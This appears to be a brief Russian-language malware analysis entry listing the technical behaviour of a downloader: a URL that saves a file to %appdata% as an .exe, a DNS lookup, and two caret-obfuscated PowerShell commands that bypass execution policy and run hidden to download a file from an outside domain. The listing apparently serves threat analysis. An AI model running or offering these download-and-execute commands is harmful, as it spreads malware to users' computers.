Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^ErS^HE^L^l^.e^X^E -EXeC^uTI^ONPoLic^y^ byPaSS -nop^ROf^i^l^e ^-Wi^NDowStY^le ^hidDe^N^ (^new^-^oBjE^cT s^YsTEM.^N^eT^.^W^ebcl^IENT)^.DOw^n^l^o^adFilE^(^'http://www.zoerpoled....
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "POW^ErS^HE^L^l^.e^X^E -EXeC^uTI^ONPoLic^y^ byPaSS -nop^ROf^i^l^e ^-Wi^NDowStY^le ^hidDe^N^ (^new^-^oBjE^cT s^YsTEM.^N^eT^.^W^ebcl^IENT)^.DOw^n^l^o^adFilE^(^'http://www.zoerpoled....' (со скрытым окном)